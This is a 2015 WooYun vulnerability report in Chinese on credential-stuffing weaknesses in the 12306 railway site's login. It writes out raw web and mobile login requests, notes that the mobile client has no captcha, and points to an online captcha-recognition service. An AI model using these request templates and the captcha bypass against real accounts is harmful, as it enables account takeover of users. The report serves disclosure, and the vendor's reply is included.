当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-092457
漏洞标题:
12306登录接口依然可被撞库攻击(验证码可识别)
相关厂商:
12306
漏洞作者:
猪猪侠
提交时间:
2015-01-17 20:33
修复时间:
2015-03-03 20:34
公开时间:
2015-03-03 20:34
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-01-17: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经确认,细节仅向厂商公开
2015-01-28: 细节向核心白帽子及相关领域专家公开
2015-02-07: 细节向普通白帽子公开
2015-02-17: 细节向实习白帽子公开
2015-03-03: 细节向公众公开

简要描述:

每个账号登陆的阀值20分钟可登录5次,验证码可识别,手机客户端无验证码

详细说明:

手机客户端无验证码
https://kyfw.12306.cn/otn/login/init

login.jpg


POST /otn/login/loginAysnSuggest HTTP/1.1
Host: kyfw.12306.cn
Content-Length: 152
Accept: */*
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/login/init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=91FA1614F112D5178E44705FDF85E4D1; BIGipServerotn=1725497610.24610.0000; current_captcha_type=C
Connection: Keep-Alive
loginUserDTO.user_name=10000%40qq.com&userDTO.password=123456&randCode=wh6e&randCode_validate=&MTQwOTA5=ZGY5Y2ZjYjEyMjI2MWJiMg%3D%3D&myversion=undefined


手机客户端无需验证码,密码在提交的时候,md5加密即可,阀值20分钟

POST /otsmobile/apps/services/api/MobileTicket/android/query HTTP/1.1
Host: mobile.12306.cn
Content-Length: 591
Origin: file://
Accept-Language: zh_CN
Authorization: {"morCustomRealm":"aDHgAUw92AQQCYjZyEX5TcAVgAncDZmQCAAUAewNzcgEoYAxMQjJrAEBBRWEWNX9AHnULd1w9cykTXj8xRxxxIlsxFUVPQmAfN0IlOi0iRRE7azdSPjVIIjVEGjIQNz46FVw8ZxZERQMeVSZoMF5nFU12Hk4xQ2ocGU4zYiJObDR3NSZPQCJJZEBtG2JBS3AyaF5EQgVGIU1IZ0VWBXdgTn1tCV89ajxgQDM5XyQ0PmVkVjRyBlc5Nm9oJEMSZnh2dkYcSjplfkd+NBx/GGhAWjFoFmEUZVNHLDFGKz5iaGtrYSVsEGZvdg=="}
X-Requested-With: XMLHttpRequest
x-wl-app-version: 2.0
x-wl-platform-version: 6.0.0
WL-Instance-Id: u76dbkg7kq364qrpfrp2oflm3f
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; GT-N7100 Build/JDQ39; CyanogenMod-0.9.9.7) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30/Worklight/6.0.0
Accept-Encoding: gzip,deflate
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: BIGipServerworklight=3705078026.16420.0000; AlteonP=0a02eb040a02ebc5284cfdfd2378; JSESSIONID=0000D6oVUcQ2f3Uw70wtfc73C9v:196iqvou7; BIGipServernginxformobile=32178698.50215.0000
Connection: Keep-Alive
adapter=CARSMobileServiceAdapterV2&procedure=login&compressResponse=true&parameters=[{"baseDTO.os_type":"a","baseDTO.device_no":"53469c87548547e","baseDTO.mobile_no":"123444","baseDTO.time_str":"20150117212733","baseDTO.check_code":"170294cbd0ab3398d8ed39217170c9ad","baseDTO.version_no":"1.1","baseDTO.user_name":"10000@qq.com","password":"327bc4e22b649d47c4546a3ec93f376b"}]&__wl_deviceCtxVersion=-1&__wl_deviceCtxSession=30549131421501159027&isAjaxRequest=true&x=0.8806376396678388


识别

http://www.80vul.com/yzm/v.php?url=https://img.wooyun.laolisafe.com/upload/201501/1720224632ac157f9dd635bd901105790c35853f.jpg


80v.jpg


12306__0.jpg


12306__1.jpg


12306__2.jpg


12306__3.jpg


12306__4.jpg


12306__5.jpg

漏洞证明:

# 识别平台1

sb1.png


# 识别平台2

12306__00.jpg


12306__11.jpg


12306__22.jpg


12306__33.jpg


12306__44.jpg


12306__55.jpg

修复方案:

登录接口的验证码可以加强,真的

版权声明:转载请注明来源 猪猪侠@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-18 01:30

厂商回复:

可被绕过和可被自动识别应该是两个意思。

最新状态:

暂无